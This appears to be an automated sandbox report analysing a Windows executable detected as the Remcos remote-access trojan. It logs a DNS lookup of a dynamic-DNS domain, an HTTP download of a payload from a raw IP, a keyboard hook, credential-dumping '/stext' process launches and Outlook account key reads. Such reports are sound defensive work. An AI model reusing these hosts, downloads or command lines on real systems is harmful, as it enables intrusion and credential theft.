Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=1824632442.1601478955
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/
Source: g4FtSOZMD9.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: g4FtSOZMD9.exe, 00000015.00000003.616430526.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616818269.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616919140.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616667092.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616571537.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616756654.0000000002283000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhvFAB7.tmp.21.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js

Source: unknown

DNS traffic detected: queries for: nhtaxfilling.ddnsgeek.com

Source: global traffic

HTTP traffic detected: GET /1040_RyQoPlW98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 147.189.137.168Cache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\g4FtSOZMD9.exe

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 22_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

22_2_0040BA30

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, type: MEMORY

Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Source: g4FtSOZMD9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, type: MEMORY

Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02296E2A	0_2_02296E2A
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02285E30	0_2_02285E30
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02285A4E	0_2_02285A4E
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228D09B	0_2_0228D09B
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02283939	0_2_02283939
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228DDDD	0_2_0228DDDD
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228CE2E	0_2_0228CE2E
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02282E19	0_2_02282E19
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02282E67	0_2_02282E67
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02295252	0_2_02295252
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02285B30	0_2_02285B30
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02285B36	0_2_02285B36
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228A760	0_2_0228A760
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02281772	0_2_02281772
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02293C6F	0_2_02293C6F
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02281844	0_2_02281844
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_022828ED	0_2_022828ED
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_022818CB	0_2_022818CB
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02280947	0_2_02280947
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228395F	0_2_0228395F
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_00081B0A	9_3_00081B0A
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_0008510A	9_3_0008510A
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_00081407	9_3_00081407
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_00086D17	9_3_00086D17
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_00087D45	9_3_00087D45
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044B040	21_1_0044B040
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044B870	21_1_0044B870
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044081D	21_1_0044081D
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0043610D	21_1_0043610D
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044AA80	21_1_0044AA80
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_00447310	21_1_00447310
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044BBD8	21_1_0044BBD8
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044A490	21_1_0044A490
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0043C560	21_1_0043C560
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_00446D30	21_1_00446D30
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_00446D8B	21_1_00446D8B
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044B610	21_1_0044B610
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044D6C0	21_1_0044D6C0
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_004476F0	21_1_004476F0
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_004050C2	22_2_004050C2
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_004014AB	22_2_004014AB
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00405133	22_2_00405133
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_004051A4	22_2_004051A4
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00401246	22_2_00401246
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_0040CA46	22_2_0040CA46
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00405235	22_2_00405235
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_004032C8	22_2_004032C8
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_004222D9	22_2_004222D9
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00401689	22_2_00401689
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00402F60	22_2_00402F60
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_1_004222D9	22_1_004222D9
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_0040D044	23_2_0040D044
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_00405038	23_2_00405038
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_004050A9	23_2_004050A9
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_0040511A	23_2_0040511A
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_004051AB	23_2_004051AB
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_004382F3	23_2_004382F3
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_00430575	23_2_00430575
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_0043B671	23_2_0043B671
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_0041F6CD	23_2_0041F6CD
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_004119CF	23_2_004119CF
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_00439B11	23_2_00439B11
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_00438E54	23_2_00438E54
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_00412F67	23_2_00412F67
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_0043CF18	23_2_0043CF18
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_1_004382F3	23_1_004382F3
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_1_00430575	23_1_00430575
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_1_0043B671	23_1_0043B671
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_1_0041F6CD	23_1_0041F6CD
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_1_00439B11	23_1_00439B11
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_1_00438E54	23_1_00438E54
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_1_0043CF18	23_1_0043CF18

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: String function: 004124F0 appears 33 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: String function: 00412627 appears 61 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: String function: 00412968 appears 153 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: String function: 00421A32 appears 71 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: String function: 00416760 appears 65 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: String function: 0044407A appears 37 times

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228DACD NtAllocateVirtualMemory,	0_2_0228DACD
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02296762 NtProtectVirtualMemory,	0_2_02296762
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228D09B NtWriteVirtualMemory,CreateFileA,	0_2_0228D09B
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228DDDD NtWriteVirtualMemory,LoadLibraryA,	0_2_0228DDDD
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00402CAC NtdllDefWindowProc_A,	22_2_00402CAC
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00402D66 NtdllDefWindowProc_A,	22_2_00402D66
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_004016FC NtdllDefWindowProc_A,	23_2_004016FC
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_004017B6 NtdllDefWindowProc_A,	23_2_004017B6

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Process Stats: CPU usage > 98%

Source: g4FtSOZMD9.exe, 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000000.00000002.470911055.00000000020E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameIndregnet8.exeFE2XCfarS vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000000.460170430.0000000000431000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.604551488.0000000020A41000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.582574015.0000000001C68000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.605978483.0000000001C8C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.605678171.0000000001C83000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe	Binary or memory string: OriginalFileName vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000015.00000000.606786406.0000000000431000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe	Binary or memory string: OriginalFilename vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000016.00000001.608400388.0000000000422000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000017.00000000.609082555.0000000000431000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe	Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe

Source: g4FtSOZMD9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: g4FtSOZMD9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: g4FtSOZMD9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Restroke.exe.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Restroke.exe.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Restroke.exe.9.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: g4FtSOZMD9.exe

Virustotal: Detection: 22%

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

File read: C:\Users\user\Desktop\g4FtSOZMD9.exe

Jump to behavior

Source: g4FtSOZMD9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"	Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,

22_2_00410DE1

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

File created: C:\Users\user\AppData\Roaming\Screenshots

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

File created: C:\Users\user\AppData\Local\Temp\~DFF48BD71CF1E747D1.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@11/24@1/2

Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, g4FtSOZMD9.exe, 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-UGB110

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 22_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource,

22_2_0041208B

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

File opened: C:\Users\user\Desktop\g4FtSOZMD9.cfg

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Unpacked PE file: 22.2.g4FtSOZMD9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
